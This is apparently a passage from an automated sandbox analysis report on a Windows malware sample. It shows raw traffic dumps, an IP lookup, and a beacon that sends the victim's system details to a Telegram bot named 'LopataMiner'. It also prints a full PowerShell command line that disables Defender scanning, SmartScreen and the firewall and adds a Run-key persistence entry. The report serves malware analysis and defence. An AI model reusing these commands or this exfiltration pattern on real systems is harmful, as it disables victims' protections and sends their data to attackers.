f0 18 0f 45 69 8f 97 66 56 0c fd f7 0a 7e 91 5f c7 3d de bf f2 82 5c a6 e4 42 d7 8f 76 89 2f 35 73 e9 01 16 2c b1 69 dc 29 c6 aa 8c 05
                                                                  Data Ascii: GU}mbb:jp2PnGG-rZ;cRn2g"s~<fI6U\i3R 33ZnmSQ2Mp:b#em #Uk}0W2FWS5.@|nmJF1SeTU>]EifV~_=\Bv/5s,i)
                                                                  2022-07-15 01:58:20 UTC4034INData Raw: 2e fd 91 77 5a 02 70 00 5b e6 f4 78 75 27 8c 04 88 27 26 6f f5 89 fe af 28 1e 57 f8 c6 10 8e ef a0 0b be 91 db 35 bd 03 d1 48 42 89 41 aa 46 4d e6 52 26 9c 00 ae e1 a4 35 5c e4 8b 9c b2 41 14 d6 cb fd f5 7f 64 ef 2c b2 5c 5f d4 08 22 46 38 a0 be 09 a4 bd e0 d2 d8 f5 b9 98 c4 1e 59 f8 7c 34 9d 07 eb 22 30 af a2 57 29 f1 bf a6 41 42 37 75 64 f9 c2 1d 6f 7f cc b8 3b d5 73 5d 3a 67 62 76 35 a0 6a e8 02 66 36 47 ad 14 dc 35 43 b4 42 76 ce 7d ed b0 27 75 ef 8b 6e 59 7f 8f bb ec 35 0a 11 b8 8c 3e 53 ba bd 5e 01 21 78 87 12 f1 4a e6 2d 8a 9b 22 53 6d 06 a9 88 e1 17 e9 c1 90 dd ba 54 ab 61 d0 7f 1c 45 65 74 fd e5 1a a7 ce 90 b3 24 6e 55 57 5b 0a 04 47 4c 75 1c cd d1 7c 79 da 00 d9 3a b8 02 67 9a 28 bd a6 e0 b4 88 c8 33 4c e9 2a 67 aa fd a4 4e 3c ce 7f ce a3 04 f0
                                                                  Data Ascii: .wZp[xu''&o(W5HBAFMR&5\Ad,\_"F8Y|4"0W)AB7udo;s]:gbv5jf6G5CBv}'unY5>S^!xJ-"SmTaEet$nUW[GLu|y:g(3L*gN<
                                                                  2022-07-15 01:58:20 UTC4050INData Raw: a4 c0 26 41 31 7e 2d cf 33 08 ec 11 5d 40 5e ac 34 c4 9f 11 2d 65 34 9e 0d 97 8a 78 b6 b2 14 e3 9d cb fe 93 ae 92 56 71 aa 14 18 ea 39 fb ca 66 2c f5 c1 7d 49 4c 52 10 81 d6 31 65 d1 1b 2a ad 4d d7 ea ec a2 19 41 f1 2d 80 b4 71 f0 9f 21 a4 f8 2b 9e 2f 6c 0d dc 24 6c bd d2 bb b7 0c 97 43 4b 0f c9 d4 83 21 ea f8 b2 ed f6 75 1f c2 25 37 57 53 0c 60 78 73 09 9c da 04 07 11 32 9b 1d 02 26 94 6c 1b 0b 28 ab 63 97 6f c1 b6 93 be 10 bc 5a e8 de 4f 5a 5b 5d 1c fd 65 36 51 da 96 d6 6b 18 f2 c6 34 a6 9b 01 5e 0f 63 58 a7 59 03 21 62 eb 8d 40 74 1c 5e dc 0c 1f 6e da b5 2d 48 40 b0 33 65 01 47 a1 9c 0f 50 f1 fb 8c 5c da b3 69 b2 99 89 60 d4 29 ea 32 14 67 ca b0 3b 71 a5 36 40 3b fc 4c c6 ed a2 19 d5 b3 00 80 ac cb 15 c2 29 2b 06 dc 9d 60 4f b3 94 d8 29 8e cc 27 4f 6d
                                                                  Data Ascii: &A1~-3]@^4-e4xVq9f,}ILR1e*MA-q!+/l$lCK!u%7WS`xs2&l(coZOZ[]e6Qk4^cXY!b@t^n-H@3eGP\i`)2g;q6@;L)+`O)'Om
                                                                  2022-07-15 01:58:20 UTC4066INData Raw: 8c 44 39 8c 17 51 1f c7 79 b4 5e 9a 28 37 0d 24 4e 4b 8e 4e db 05 d6 b9 ff 81 46 2c aa 72 13 5d 84 69 96 b3 c6 13 fb 24 f0 4b 30 fd 71 10 d1 08 01 4f e2 f2 c9 40 e2 ce 29 ff 6b 43 85 b3 2b da b3 65 b0 9a 71 3b 6d f5 5d a2 99 47 87 78 72 73 ce 6b 11 a8 e9 33 7f f1 46 23 05 65 a3 ff 91 94 a8 8c 3c ba 6c e2 03 f8 48 e7 61 26 2a 15 1b 67 ea 40 35 bf ec 96 ec a3 5d 8b b1 32 6c c3 c8 b9 76 26 6f 49 ef d0 e5 88 84 d4 74 b2 28 d1 51 10 97 50 20 a0 61 e8 7b bb 66 a3 43 45 f6 9f 6e d7 58 73 f7 d7 e7 6d 31 50 90 f8 a0 71 67 dd 9d 45 cd 8e ba 84 8c 2e 8b 05 fa 31 28 59 e0 8a d6 74 aa eb b5 ec c6 31 e4 49 71 9f e6 27 21 a9 e5 fe 55 0f c8 5a 22 c7 86 75 ea 95 bf c5 ad 5e 45 d2 35 d9 3e e9 88 17 44 7c 06 ba 73 e0 b1 b1 18 d4 44 ff 81 6f 6f 66 ff 60 01 6b 62 dc 60 cd 1e
                                                                  Data Ascii: D9Qy^(7$NKNF,r]i$K0qO@)kC+eq;m]Gxrsk3F#e<lHa&*g@5]2lv&oIt(QP a{fCEnXsm1PqgE.1(Yt1Iq'!UZ"u^E5>D|sDoof`kb`
                                                                  2022-07-15 01:58:20 UTC4082INData Raw: 20 04 17 f8 7f 5f 07 cc 45 79 32 3b 43 55 4f fc c8 c8 4d bc e6 cd 86 0d a0 6a 2a c3 0f 39 91 c3 91 c8 5d d4 68 cd 36 34 0c 1e 16 98 21 a9 6c 9d 9a 17 11 fa 39 89 3c 78 b3 05 28 b5 12 08 2a c5 64 7e 62 e6 50 5d 29 77 f2 e2 6e ec 63 c8 dd c7 fc 07 27 88 71 0a 26 a4 4a 13 64 8c af 0b 26 bc c9 0a e9 d3 1c 15 55 fa 2f c1 75 e9 34 63 c5 8c bb c5 d4 c9 95 8d a6 fc 90 a3 1d 15 fc 60 78 0a 8c db 0b 4f 35 41 b9 ca 62 81 1e d8 fa 58 87 63 1f ed 08 1b 19 1b 47 f6 90 2c 3f 2c b2 06 90 9b 4e b4 3b 3a c7 60 6c 16 50 b6 3f a4 a0 30 ef ed 9e 17 dd 7f 77 a6 25 27 15 cd 7c 04 94 ec 85 0a d8 46 bd ed f3 44 dd c7 68 5e 59 00 92 07 85 dc e8 20 52 44 31 77 ee 7d e9 08 08 c5 6b 00 d9 8a 49 03 dc 49 46 c0 8b 1e 8d 54 60 39 06 76 3b 55 89 48 32 eb 66 19 45 19 f7 61 2f 59 07 ec 68
                                                                  Data Ascii: _Ey2;CUOMj*9]h64!l9<x(*d~bP])wnc'q&Jd&U/u4c`xO5AbXcG,?,N;:`lP?0w%'|FDh^Y RD1w}kIIFT`9v;UH2fEa/Yh
                                                                  2022-07-15 01:58:20 UTC4098INData Raw: 1e 75 71 56 32 7e c6 d3 07 49 55 52 f2 87 25 00 6f b9 38 ca 8c f7 ff 4d cc 78 dc 60 fe 7f 9f 17 e5 30 78 d4 0f f7 72 fc 84 9b 5a 98 7d 53 9a 12 6d 64 0b 49 b9 7d c9 d9 1c 67 4e 0b 70 ae bc dd 73 4e 3f 14 7d 05 f0 0c 67 88 76 0b ed 38 2a 60 fb c7 c6 b5 2b c5 ba d5 de e6 9d ad a7 69 72 44 8c dc c8 64 f5 6d 24 8b 82 c5 8c 87 a3 a6 c8 d2 99 a7 27 67 91 f2 ef d5 f3 1e 37 99 8d 0d 53 05 2f 28 92 e1 98 0e da bc da ed 06 fa 53 d9 7b fb 4e 86 63 15 8a a7 bb 68 ea cf 3a 44 a7 b6 7b 6c e4 2f 01 81 0f d6 14 8c 21 f6 d1 88 3c 7e 5a 67 83 7b b0 27 b1 7c 95 2c 22 54 8d 4d 7b b5 04 a1 17 8f 33 df ac 9a 15 9a 7d de 56 22 43 7f 8c eb 0a 2c 8d a4 0d 65 4b 96 f6 76 d0 ac 16 04 c4 d0 ca 0d 83 d3 56 25 12 d1 01 5f ec 03 a5 9d 52 f8 1b 45 38 f4 e7 72 53 cf 4e 4c 8a 9e 6d 84 12
                                                                  Data Ascii: uqV2~IUR%o8Mx`0xrZ}SmdI}gNpsN?}gv8*`+irDdm$'g7S/(S{Nch:D{l/!<~Zg{'|,"TM{3}V"C,eKvV%_RE8rSNLm
                                                                  2022-07-15 01:58:20 UTC4114INData Raw: c0 88 31 2e 2d 11 9e 92 6a bf 77 60 33 2e a6 46 4a cf b0 64 e9 62 b2 1c 47 40 26 34 af 8a 4f be f3 06 ac 1f 5f 80 f9 b8 28 d8 ef 3c a4 08 60 b6 8f 76 ee c8 c0 08 81 3c 5f 8e 8b a9 15 b5 32 a7 b6 94 55 3f 9f b1 48 cc e4 88 af 75 fa 78 5e 7d 65 7a 16 dc 3a 41 84 3d a0 1b f7 87 2a 9b 78 95 9d e9 09 d6 87 15 40 d8 60 2e 93 43 8f bf b9 67 14 f5 f3 a4 ee f4 7a f5 b9 2a 7d ce 3e 5a 7b f7 cd 45 9e 44 09 c2 79 01 b1 50 88 37 80 ac 73 8f 41 c6 48 06 26 c4 c8 47 ca 68 98 4e 2c 9d d1 fd da 0f 34 d9 b9 fa 50 b7 c0 0b 64 b4 b0 af 96 88 ca 3c 98 29 5d be d2 29 0c 1c 49 4f 90 9e fa 16 48 3a a4 00 f2 33 62 ff cf 4e 2b 8a 3f f8 08 b1 bd cb a0 82 89 ee b8 75 12 f6 44 30 61 71 3b dd 64 b2 65 50 9b 22 d5 5b 9c 55 e2 de ad 6c 84 f8 35 72 22 f1 3b b9 d5 d4 7d 41 71 91 67 25 b1
                                                                  Data Ascii: 1.-jw`3.FJdbG@&4O_(<`v<_2U?Hux^}ez:A=*x@`.Cgz*}>Z{EDyP7sAH&GhN,4Pd<)])IOH:3bN+?uD0aq;deP"[Ul5r";}Aqg%
                                                                  2022-07-15 01:58:20 UTC4130INData Raw: 98 18 62 26 a5 74 96 b5 25 62 51 30 9e 79 74 46 80 42 be 7f 69 77 85 93 3d 57 9f 29 49 1b 0d 46 0b 56 04 06 0f f6 04 0e 4b 03 4b 78 57 75 d1 a0 89 80 fc 71 56 dc 29 e5 b6 21 e6 21 2e fa 99 4f 67 3e e5 bc 23 17 e1 35 8e 54 19 cb f4 05 eb 3f cb c0 7f 41 5f 4b a2 bd 05 29 e3 a7 d5 bb 0d ce 08 ff 62 57 28 17 99 a5 63 eb 0c eb d6 63 f8 21 4d af d3 81 67 ec a9 fa 53 ee ec bb a7 b9 5c a7 00 f0 15 66 0c 51 50 b9 03 23 00 91 6a bb cf ca 7b 07 f4 3b 2b d1 12 e7 f0 1e 6c 56 38 c6 c2 bb d9 ff 6d 40 ec 19 6a 49 bb be 0e 59 a2 ca c0 1d c9 eb 15 18 64 45 9a 8e 79 a0 d4 9d b6 b4 01 8d 93 81 37 78 67 32 c5 c9 aa 79 e2 25 c7 3e fc 3c 11 f2 1b 4f 33 ba d6 33 06 07 79 be 28 e6 3a 8b 85 14 a8 ef 82 74 47 6e f4 3e 54 2f 07 14 e2 d8 aa 65 bf 28 47 d3 51 46 95 a6 de 6c 22 4d b9
                                                                  Data Ascii: b&t%bQ0ytFBiw=W)IFVKKxWuqV)!!.Og>#5T?A_K)bW(cc!MgS\fQP#j{;+lV8m@jIYdEy7xg2y%><O33y(:tGn>T/e(GQFl"M
                                                                  2022-07-15 01:58:20 UTC4146INData Raw: 92 b8 7e 32 02 64 94 06 8d 58 c3 e0 35 91 ed 56 81 35 7a 3f ce 3d f4 32 68 b2 43 ef be 7b f2 63 9b c0 c6 e9 e4 11 da d0 60 2f 91 4f 72 3d f6 95 0d ea c1 3b 7a b6 04 b3 45 3f 79 19 26 69 a5 7f a4 0f cd 21 0a 67 d8 73 5d 8b ce 57 7e 9d 36 35 bd 1c bb d0 73 cb 05 6d 2c f2 ed f7 23 9b 21 ee 11 c5 67 bd 2a 59 1d 46 c6 56 1a 22 7e 13 de 97 d7 c3 36 bf 98 ad 57 96 86 89 4b 4a e9 64 c7 b6 5a fa fc bc 66 75 aa f9 75 38 e4 19 8c 7a 02 c3 47 26 e2 d6 ab d3 cf fb 49 bc ac 26 a1 8b 3d 8e f1 3e 21 e5 98 7b 4e ef d6 99 8b 9b 7a 24 48 88 fb 02 c7 c4 b2 af 65 ae 01 98 f8 f8 e6 02 fb 73 e5 b0 cb 76 5c 4c 17 96 e5 65 54 62 b8 4b 30 de ff 7c 84 b1 99 3f b0 95 7e 0b 10 a2 5e 36 2d 39 16 6a 0f 0a 21 2a 88 9c 33 9b ae 1b f7 bd 88 6e 0a 2d 1b 7a 23 93 c9 ee a5 3c d4 21 60 9a af
                                                                  Data Ascii: ~2dX5V5z?=2hC{c`/Or=;zE?y&i!gs]W~65sm,#!g*YFV"~6WKJdZfuu8zG&I&=>!{Nz$Hesv\LeTbK0|?~^6-9j!*3n-z#<!`
                                                                  2022-07-15 01:58:20 UTC4162INData Raw: 38 3a 16 e4 e3 3a ef fd 55 9b ac b6 0b 65 b3 7b 6d 58 51 e2 58 67 52 17 99 b6 de 9f 4a ac 6c 37 26 7d 77 a2 bb 24 21 e7 90 b3 bc 65 79 3f 00 b3 da 92 b7 e3 64 00 d8 1f aa 3b c5 ab 62 25 f4 13 c5 2e 60 0d fc 9e 23 ad 26 19 8c 38 18 28 39 14 2e cd 8c 45 3c 48 7b fa 9f 65 81 63 a1 13 f3 a8 fd 6a 66 c7 cf de e3 23 37 87 c9 ad 60 b5 c9 e9 fc 1d 77 71 c4 7d 64 2d 6c 08 34 e6 c8 ee 29 71 68 f9 0e 1f 1a 72 e7 06 db bb e9 39 13 ab 58 09 44 ea 2c 54 64 fb 61 bd 6b 22 75 22 66 ea a1 a3 fd 04 55 22 8c 22 a7 03 82 fc 41 a3 d6 ec 71 88 a3 03 ac ac fc 53 22 9d 39 f4 23 0f be f1 32 cd b4 0e 81 0a 0d 71 7f e2 21 c0 40 0d 44 15 5d d7 53 4e 82 ac e5 6c 17 c1 bf 1e a4 eb 28 df 47 c3 c9 d2 9b bc 78 0e 1a 66 73 bd d6 7f a6 90 6c 12 ab 10 e5 45 17 3c 49 16 17 71 ad 3b a7 d9 17
                                                                  Data Ascii: 8::Ue{mXQXgRJl7&}w$!ey?d;b%.`#&8(9.E<H{ecjf#7`wq}d-l4)qhr9XD,Tdak"u"fU""AqS"9#2q!@D]SNl(GxfslE<Iq;
                                                                  2022-07-15 01:58:20 UTC4178INData Raw: b0 1d da d1 0d 58 50 be 2b 21 61 84 03 69 99 65 84 7d 11 f7 32 ab be 64 dd 4b 70 41 b9 e4 18 b9 37 84 d6 93 78 f7 73 76 d1 28 ca 6a f0 7a 2a b0 f7 27 f8 73 97 18 df a8 ab d2 6d 54 73 2e ea be ee 2f 1c fd 0b 02 56 fd 40 ca c4 59 f9 84 ba 60 d6 6d 7d 80 78 33 57 bd dc c3 29 0c 30 40 ee 44 a1 73 5f 2a fd c8 3a 02 c3 9d 75 f3 66 c6 cf 75 fc 18 44 d1 f6 62 e1 fa 58 38 89 b1 7e 0c ae 4c dd 53 7b ae a7 b3 26 e0 ba 49 e2 ae f8 ce 76 14 c4 58 2f 40 5d 77 7a 7d 8f 00 d5 37 7c 43 48 f5 53 62 33 50 fa d8 46 a6 e0 6a 85 53 69 b7 14 fa ad bd 9e 94 47 88 98 ce 1d 10 0d c9 47 b0 fd 12 87 5a 5a 08 60 81 9a fd 50 d0 48 7e 23 f6 51 6e de 9f f8 96 6c cf 30 e6 70 96 30 a3 ef bb 01 ed 22 2b 7a 19 50 4e 61 2d c2 12 f7 ff 7e f8 58 17 5d e3 e9 93 34 0c 10 71 a6 fb 4e 8b 90 f6 99
                                                                  Data Ascii: XP+!aie}2dKpA7xsv(jz*'smTs./V@Y`m}x3W)0@Ds_*:ufuDbX8~LS{&IvX/@]wz}7|CHSb3PFjSiGGZZ`PH~#Qnl0p0"+zPNa-~X]4qN
                                                                  2022-07-15 01:58:20 UTC4194INData Raw: c6 57 e1 3e 86 d4 b5 11 a1 9b 9f e9 88 cc 50 b5 8d dc 64 b3 24 b1 ad 0f c5 10 4f 53 6c 62 de 28 8d 9b 8d 06 d4 cc 21 57 5d 5a 1a 3f 9c 07 54 13 b0 79 bf 7c a3 82 71 9b f5 d4 0f 38 f1 ce 56 ee e8 b9 b4 a1 dd ed 55 74 38 18 df e1 c7 eb 14 ce 8d 6a 04 45 5f 17 19 0d bb 3f 8b 1c b6 16 68 4e 09 c1 90 05 aa b0 89 30 84 dc 91 28 98 d1 2a 60 97 a1 3f 77 09 f9 01 24 3d eb ec cc 60 41 f6 a9 25 e5 ed c1 40 f2 9c fb 56 57 20 3f 02 ef aa de 05 69 d8 27 9a 30 2d 9f 20 b5 1d fb 91 0f 17 8c 31 54 3c dd 16 42 e7 ba 37 e3 60 9f a9 39 c4 f0 d3 f0 3d 1f 89 5e c7 32 a3 ec 4b dc 65 0d 36 f7 77 d0 5e b8 25 1d ad c5 39 14 32 aa b9 9d 3d 07 35 ad d8 f9 d5 9e 1f 1c 67 34 b6 cb e8 b3 de 4c 46 1e 8d 81 45 f1 9a 84 bd 24 68 42 f8 28 e8 28 ce 1d 1a 45 8e b5 3a 44 c7 85 bc 9e 8f fd 16
                                                                  Data Ascii: W>Pd$OSlb(!W]Z?Ty|q8VUt8jE_?hN0(*`?w$=`A%@VW ?i'0- 1T<B7`9=^2Ke6w^%92=5g4LFE$hB((E:D
                                                                  2022-07-15 01:58:20 UTC4210INData Raw: cd 48 af 80 9b 59 2a 2f 00 89 ea eb f1 4f 7b 9a c7 de 69 bd e6 69 0a 03 7d ab 11 b3 3c 60 8b 91 58 00 4b f8 e8 71 e3 09 5d 47 03 3b 02 20 29 4a aa 97 50 30 05 ba 0f 04 72 4f ba b8 48 b2 7e 7b 16 15 99 c3 e7 78 be 7a 98 70 c6 96 d0 18 3d 62 05 47 ee b9 0a 6d 23 1b c7 a5 f9 b8 77 7a 8d c0 4b 51 67 2a ed 1e ac b9 3b 61 e7 0e bf 6f ae 1a e6 4d be 0e 2b 69 7b 1a 47 cf b3 d3 9b c3 8f cd a7 64 14 44 ea 13 da 96 60 33 f0 ba 21 10 2f fa ed 55 ca 01 dc 0c b4 53 ae 8b 65 9a e1 94 b0 3c bf dd cc b6 aa 64 3f ca a4 1c 98 35 85 ba 02 2f 1c 60 e4 6d c4 49 e0 2a f9 47 c6 e7 b3 9e 97 3f c1 36 5c 66 bf 9b 3d 37 3f fb 23 9c 72 67 42 2b 7d 6f 33 b4 0b 88 dc 79 16 62 e9 78 e5 51 38 29 df 71 ee e6 82 36 28 d6 e9 a9 b6 c5 e0 5e 4b aa 7b 59 37 97 71 88 2a fa 6f 1f a4 9f 1e fe 2e
                                                                  Data Ascii: HY*/O{ii}<`XKq]G; )JP0rOH~{xzp=bGm#wzKQg*;aoM+i{GdD`3!/USe<d?5/`mI*G?6\f=7?#rgB+}o3ybxQ8)q6(^K{Y7q*o.
                                                                  2022-07-15 01:58:20 UTC4226INData Raw: 0e 5d 3f 9b 7c 92 af 59 f9 b2 29 c6 20 75 a8 f9 57 69 d6 03 46 1f 1c c9 94 f9 9e c1 96 cf 4b d4 dc de 4d 62 a9 f3 4b 7f df ff b8 38 38 ea 0d d7 3d 27 74 3c 76 dd 5c c1 21 08 74 cf 1e 71 66 e2 78 72 bc d2 0c e1 09 ca 04 d2 2d a7 bd 4d 92 05 cd c6 2f e9 72 99 a7 66 34 32 55 af 60 bf f0 c5 ac c9 9e 34 12 ea 7c a5 b9 2b e4 b8 3b 34 01 6e 4b 3d 3b f9 c6 34 e2 db 10 b3 ca ac 04 3d e0 46 56 52 d4 dd 08 7f ff 21 8e 7c 5b c1 b8 5f 5d 4c 2a af c7 6a e9 70 8c 47 ea ad 79 23 ef db 10 7f 89 26 fc 98 b8 c1 16 83 2c ef c0 f3 45 55 2b 2c 18 48 b3 68 6d 4e 35 c5 ce 5d fe 34 ee 2b 40 c1 f5 86 b2 3e 68 6a e7 d3 2c d4 93 2a 22 79 62 3c 5e 1b af c4 9a 9f 74 fb 98 27 3f 93 5e ef 21 60 5f e0 fe 84 02 75 47 41 ce dc 35 d7 1d cc bf 5e e2 ad b4 41 a5 1a 39 3f 06 00 4b 26 53 a0 1e
                                                                  Data Ascii: ]?|Y) uWiFKMbK88='t<v\!tqfxr-M/rf42U`4|+;4nK=;4=FVR!|[_]L*jpGy#&,EU+,HhmN5]4+@>hj,*"yb<^t'?^!`_uGA5^A9?K&S
                                                                  2022-07-15 01:58:20 UTC4242INData Raw: a8 f7 56 65 6a 58 82 29 54 7d 2a 0c 08 d8 95 67 ca 91 c9 3e 0a 87 a1 32 10 ef 59 2b bc 76 93 6d 0e c1 c1 4e 53 3d 6c f2 7e 95 fe 21 2b 75 8f 9e 88 4e 15 06 cf 2c df 6e a1 41 2f d8 30 a5 b0 b3 8d 07 30 6f 34 7a 86 0c 97 80 1c ec fb c2 b7 cb 9e 03 30 1f b4 35 f9 53 76 ea fe 24 fc 54 16 73 6c 97 d5 61 64 fe 8a 4e 0e 25 16 b7 c5 b1 c9 db 91 23 30 a6 d4 ab 7d c8 3b 86 16 38 a4 4e d9 d5 4c 27 d0 22 73 c9 09 57 fb 9a df 41 fa d2 ed 30 29 f6 5d 3f 18 95 30 34 cf 6c e7 5f 95 4b df db 8f bb 5d ba 8d e0 da 35 50 72 d5 7c ca 03 bb be 55 81 12 f3 f9 db 2d af eb dc 81 52 ec 95 11 e7 eb d9 27 a4 b5 4d 64 a6 a1 06 8c bf 14 df d1 7d 6a 61 a2 4c 22 3b 62 d1 02 dc 7e 96 5a 1b 2f f3 66 80 fe 97 ff e4 32 7d 47 09 de d0 7b 84 9f c7 80 31 31 d8 a5 2c 1b c1 3d 56 f4 7a e3 7f 5d
                                                                  Data Ascii: VejX)T}*g>2Y+vmNS=l~!+uN,nA/00o4z05Sv$TsladN%#0};8NL'"sWA0)]?04l_K]5Pr|U-R'Md}jaL";b~Z/f2}G{11,=Vz]
                                                                  2022-07-15 01:58:20 UTC4258INData Raw: 50 e6 ec dd 69 48 82 2c d3 31 f2 f0 bb 71 b9 45 d6 f0 14 14 34 a4 d7 12 fd 08 4b 36 12 19 b6 59 ab 1f 0a 4c 9e d9 dc 8e 91 ed 98 3b d6 16 25 e5 38 c6 74 8f b6 f6 f2 6c c1 9c d6 68 89 d2 a3 ea f3 9c 71 f4 9f e2 7d 2e 7f de 7c 34 ca dc 7f 24 5b 35 b0 8f a0 91 40 3e 70 64 a2 ad 7b 52 bb 83 8a a6 2b c2 3a 94 93 b0 93 60 0f a2 6e c1 ce 85 e5 91 47 ce 58 f8 ca 6f 70 8d d5 27 85 4e 7d 27 d5 35 6d a6 1b ab a1 d3 72 94 0b 3e 73 ee fb e6 71 79 16 5c 77 7f 76 37 3b 3f d1 f7 ba d1 5c 23 e6 6f e6 97 53 76 d8 7c 21 af e4 3d c3 7a cc 46 c7 b3 f9 6f dc 8b 9d 74 78 57 e5 3f 64 63 cc fb 6f 80 8b 48 a1 88 8c 6a 24 d7 11 13 07 87 ea 78 fc d9 25 6b 60 2c 67 6f 79 47 e1 a7 a9 07 72 ce 87 c0 3c 3d a0 3b e9 16 12 29 ed 3d dd aa 8f 18 ef 92 61 11 70 fd ed 5d 1b 5e 9e a8 ac 0d cf
                                                                  Data Ascii: PiH,1qE4K6YL;%8tlhq}.|4$[5@>pd{R+:`nGXop'N}'5mr>sqy\wv7;?\#oSv|!=zFotxW?dcoHj$x%k`,goyGr<=;)=ap]^


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.6497703.220.57.224443C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-07-15 01:58:41 UTC4268OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                  Host: api.ipify.org
                                                                  2022-07-15 01:58:41 UTC4269INHTTP/1.1 200 OK
                                                                  Server: Cowboy
                                                                  Connection: close
                                                                  Content-Type: text/plain
                                                                  Vary: Origin
                                                                  Date: Fri, 15 Jul 2022 01:58:41 GMT
                                                                  Content-Length: 11
                                                                  Via: 1.1 vegur
                                                                  2022-07-15 01:58:41 UTC4269INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 34
                                                                  Data Ascii: 84.17.52.14


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.649771149.154.167.220443C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-07-15 01:58:42 UTC4269OUTGET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=486764648&text=New%20User:%20287400%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%2084.17.52.14 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                  Host: api.telegram.org
                                                                  2022-07-15 01:58:42 UTC4269INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 15 Jul 2022 01:58:42 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 394
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2022-07-15 01:58:42 UTC4269INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 33 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 34 36 38 38 31 39 30 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 38 36 37 36 34 36 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 69 64 64 65 6e 73 20 4e 45 20 57 4f 52 4b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 70 49 64 72 65 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 37 38 35 30 33 32 32 2c 22 74 65 78 74 22 3a 22 4e
                                                                  Data Ascii: {"ok":true,"result":{"message_id":35344,"from":{"id":5468819057,"is_bot":true,"first_name":"LopataMiner","username":"LopataMiner_bot"},"chat":{"id":486764648,"first_name":"Hiddens NE WORK","username":"IpIdres","type":"private"},"date":1657850322,"text":"N


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:03:58:08
                                                                  Start date:15/07/2022
                                                                  Path:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\bQQHP9ciRL.exe"
                                                                  Imagebase:0x140000000
                                                                  File size:3574272 bytes
                                                                  MD5 hash:F56E50F8EE4DFB577CBB3F53F42ED20C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:1
                                                                  Start time:03:58:10
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:2
                                                                  Start time:03:58:17
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                                                  Imagebase:0x7ff620040000
                                                                  File size:447488 bytes
                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:3
